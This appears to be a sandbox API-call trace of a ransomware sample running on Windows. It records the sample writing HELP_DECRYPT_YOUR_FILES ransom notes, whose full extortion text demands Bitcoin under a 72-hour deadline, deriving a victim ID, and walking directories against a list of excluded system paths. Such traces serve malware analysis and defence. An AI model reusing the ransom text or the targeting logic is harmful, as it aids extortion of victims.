	[0175.128] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov"
	[0175.129] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*.*"
	[0175.129] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.129] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.129] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0175.129] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.130] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0175.130] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0175.133] CloseHandle (hObject=0x390) returned 1
	[0175.133] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.134] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.134] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0175.136] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0175.136] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.136] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0175.137] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0175.137] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0175.137] CloseHandle (hObject=0x390) returned 1
	[0175.148] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.149] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.149] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0175.149] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0175.149] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.165] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0175.166] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0175.169] CloseHandle (hObject=0x390) returned 1
	[0175.170] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.170] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.171] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0175.172] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.172] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.172] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0175.173] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.173] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0175.173] CloseHandle (hObject=0x390) returned 1
	[0175.173] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x81e78ff2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81eeb5e9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0175.174] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*.*") returned 89
	[0175.174] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.174] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*") returned 0x59
	[0175.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.174] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0175.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.175] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0175.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.175] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0175.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.175] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.175] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0175.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.176] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0175.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.176] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.176] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0175.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.176] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0175.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.177] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0175.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.177] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0175.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.177] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0175.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.178] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.178] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.178] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0175.178] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.178] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0175.178] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.178] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0175.179] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.179] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0175.179] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.179] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0175.179] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.179] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0175.179] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0175.180] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0175.180] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x81e78ff2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81eeb5e9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="..", cAlternateFileName="")) returned 1
	[0175.180] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0175.180] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81ec5703, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81ec5703, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81f118f1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0175.180] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81e9f4a4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81e9f4a4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81ec5703, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0175.180] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0175.180] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0175.180] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0175.180] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov"
	[0175.180] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\"
	[0175.181] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime"
	[0175.181] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime"
	[0175.181] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\"
	[0175.181] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\"
	[0175.181] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*.*"
	[0175.181] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName=".", cAlternateFileName="")) returned 0xfb95f0
	[0175.182] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*.*") returned 97
	[0175.182] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.189] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*") returned 0x61
	[0175.189] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.189] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0175.189] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.189] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0175.190] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.190] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0175.190] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.190] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.190] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.190] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0175.190] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.191] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0175.191] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.191] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.191] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.191] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0175.191] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.191] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0175.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.192] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0175.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.192] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0175.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.192] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0175.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.192] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.193] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0175.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
